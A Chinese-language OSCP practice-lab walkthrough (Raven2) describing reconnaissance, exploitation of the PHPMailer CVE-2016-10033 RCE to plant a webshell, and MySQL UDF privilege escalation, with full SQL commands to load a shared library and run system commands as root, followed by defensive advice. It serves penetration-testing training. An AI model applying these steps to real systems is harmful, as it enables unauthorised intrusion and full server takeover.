OSCP靶场52——Raven2 渗透测试实战教学文档<\/h1>

攻击链概览<\/h2>

信息收集<\/strong>：端口扫描、目录枚举、WordPress组件识别<\/li>
边界突破<\/strong>：利用PHPMailer插件漏洞（CVE-2016-10033）获取初始访问权限<\/li>

权限提升<\/strong>：通过MySQL UDF提权从www-data用户提升至root权限<\/li> <\/ol>
关键技术知识点<\/h2>
PHPMailer漏洞（CVE-2016-10033）<\/h3>

影响版本<\/strong>：PHPMailer 5.2.16及以下版本<\/li>
漏洞类型<\/strong>：远程代码执行（RCE）<\/li>
利用条件<\/strong>：需要知道邮件发送功能的具体文件路径（如contact.php）<\/li> <\/ul>
MySQL UDF提权<\/h3>

前提条件<\/strong>：

MySQL以root权限运行<\/li>
具备FILE权限（可写入文件）<\/li>
secure_file_priv设置允许文件导出到特定目录<\/li> <\/ul> <\/li>
核心原理<\/strong>：通过创建用户定义函数（UDF）执行系统命令<\/li> <\/ul>
详细渗透过程<\/h2>
第一阶段：信息收集<\/h3>
端口扫描<\/h4>
# 快速端口发现<\/span> <\/span><\/span>ports=<\/span>$(<\/span>nmap -p- --min-rate=<\/span>1000<\/span> -T4 172.16.33.190 | grep ^[<\/span>0-9]<\/span> | cut -d '\/'<\/span> -f 1<\/span> | tr '\n'<\/span> ','<\/span> | sed s\/,$\/\/)<\/span> <\/span><\/span> <\/span><\/span># 详细服务扫描<\/span> <\/span><\/span>nmap -A -p$ports 172.16.33.190 > n1.txt <\/span><\/span><\/code><\/pre>关键发现<\/strong>：<\/p> 80端口：Web服务（潜在的信息源，可能包含SSH密钥或用户名）<\/li> 22端口：SSH服务<\/li> 111、48407端口：可能存在的辅助服务<\/li> <\/ul> Web目录枚举<\/h4> # 使用gobuster进行目录扫描<\/span> <\/span><\/span>gobuster dir -u http:\/\/172.16.33.190\/ -w \/usr\/share\/dirb\/wordlists\/common.txt -t 10<\/span> --timeout 15s --delay 100ms <\/span><\/span> <\/span><\/span># 使用dirsearch进行文件类型扫描<\/span> <\/span><\/span>dirsearch -u http:\/\/172.16.33.190\/ -f -e php,txt,pdf,html <\/span><\/span><\/code><\/pre>重要发现<\/strong>：<\/p> PHPMailer 5.2.16<\/strong>：存在已知RCE漏洞<\/li> WordPress站点<\/strong>：需要进一步枚举<\/li> .DS_Store文件<\/strong>：macOS系统文件（信息价值有限）<\/li> <\/ol> WordPress漏洞扫描<\/h4> wpscan --url http:\/\/172.16.33.190\/wordpress\/ --enumerate vp,vt,u --api-token [<\/span>TOKEN]<\/span> <\/span><\/span><\/code><\/pre>用户枚举结果<\/strong>：发现两个普通用户账户<\/p> 第二阶段：边界突破<\/h3> PHPMailer漏洞利用<\/h4> 漏洞验证<\/strong>：<\/p> searchsploit PHPMailer <\/span><\/span><\/code><\/pre>发现两个RCE漏洞利用脚本，选择适合5.2.16版本的进行测试。<\/p> 关键配置要点<\/strong>：<\/p> 目标路径<\/strong>：必须指定完整Web路径（如\/var\/www\/backdoor.php<\/code>）<\/li> 目标文件<\/strong>：邮件发送功能页面（contact.php<\/code>）<\/li> 利用URL<\/strong>：http:\/\/172.16.33.190\/contact.php<\/code><\/li> <\/ul> 利用过程<\/strong>：<\/p> 修改漏洞利用脚本中的IP和端口参数<\/li> 设置正确的Webshell写入路径<\/li> 访问webshell获取反向连接<\/li> <\/ol> 常见问题解决<\/strong>：<\/p> 如果无法弹回shell，检查路径是否正确<\/li> 验证contact.php页面是否确实存在邮件发送功能<\/li> <\/ul> 第三阶段：权限提升<\/h3> 初始权限评估<\/h4> 获得www-data用户权限后，发现两个普通用户账户，但SSH爆破未成功。<\/p> 提权路径分析<\/h4> # 检查以root权限运行的进程<\/span> <\/span><\/span>ps -aux | grep root <\/span><\/span><\/code><\/pre>发现MySQL以root权限运行，符合UDF提权条件。<\/p> MySQL UDF提权详细步骤<\/h4> 1. 环境验证<\/strong><\/p> -- 检查文件导出权限 <\/span><\/span><\/span><\/span>show<\/span> variables like<\/span> '%secure_file_priv%'<\/span>; <\/span><\/span><\/code><\/pre>需要确保该值允许文件导出到系统目录（如\/usr\/lib\/mysql\/plugin\/<\/code>）<\/p> 2. 编译UDF库<\/strong><\/p> # 编译共享库<\/span> <\/span><\/span>gcc -g -c 15.c <\/span><\/span>gcc -g -shared -Wl,-soname,15.so -o 15.so 15.o -lc <\/span><\/span><\/code><\/pre>3. 数据库操作<\/strong><\/p> use mysql; <\/span><\/span> <\/span><\/span>-- 创建临时表存储so文件 <\/span><\/span><\/span><\/span>create<\/span> table<\/span> foo(line blob); <\/span><\/span> <\/span><\/span>-- 将so文件内容插入表中 <\/span><\/span><\/span><\/span>insert<\/span> into<\/span> foo values<\/span>(load_file('\/tmp\/15.so'<\/span>)); <\/span><\/span> <\/span><\/span>-- 将so文件导出到插件目录 <\/span><\/span><\/span><\/span>select<\/span> *<\/span> from<\/span> foo into<\/span> dumpfile '\/usr\/lib\/mysql\/plugin\/15.so'<\/span>; <\/span><\/span> <\/span><\/span>-- 创建UDF函数 <\/span><\/span><\/span><\/span>create<\/span> function<\/span> do_sysf returns<\/span> integer soname '15.so'<\/span>; <\/span><\/span> <\/span><\/span>-- 验证函数创建成功 <\/span><\/span><\/span><\/span>select<\/span> *<\/span> from<\/span> mysql.func; <\/span><\/span><\/code><\/pre>4. 执行提权命令<\/strong><\/p> -- 通过UDF函数执行系统命令，反弹root shell <\/span><\/span><\/span><\/span>select<\/span> do_sysf('反弹shell命令'<\/span>); <\/span><\/span><\/code><\/pre>关键注意事项<\/h2> PHPMailer漏洞利用要点<\/h3> 路径准确性<\/strong>：必须使用绝对路径而非相对路径<\/li> 目标文件确认<\/strong>：确保contact.php确实存在且可访问<\/li> 防火墙规避<\/strong>：注意出站连接可能被防火墙拦截<\/li> <\/ol> MySQL UDF提权关键点<\/h3> 权限验证<\/strong>：确认MySQL以root运行且具有FILE权限<\/li> 目录权限<\/strong>：确保对\/usr\/lib\/mysql\/plugin\/<\/code>目录有写入权限<\/li> 函数创建<\/strong>：函数名和so文件名需要对应<\/li> 命令执行<\/strong>：通过函数执行系统命令时注意命令格式<\/li> <\/ol> 防御建议<\/h2> 针对PHPMailer漏洞<\/h3> 及时更新PHPMailer到安全版本<\/li> 对用户输入进行严格过滤和验证<\/li> 限制文件上传功能和邮件发送权限<\/li> <\/ol> 针对MySQL提权<\/h3> 避免以root权限运行MySQL服务<\/li> 限制MySQL的FILE权限<\/li> 设置严格的secure_file_priv值<\/li> 定期审计数据库用户权限<\/li> <\/ol> 总结<\/h2> 本靶场展示了从外部侦察到完全控制服务器的完整攻击链，重点强调了：<\/p> 细致的信息收集对后续攻击的重要性<\/li> 已知漏洞的准确识别和利用<\/li> 多阶段提权路径的识别和利用<\/li> 数据库服务安全配置的关键性<\/li> <\/ul> 通过掌握这些技术要点，安全人员可以更好地理解真实环境中的攻击手法，并制定相应的防御策略。<\/p>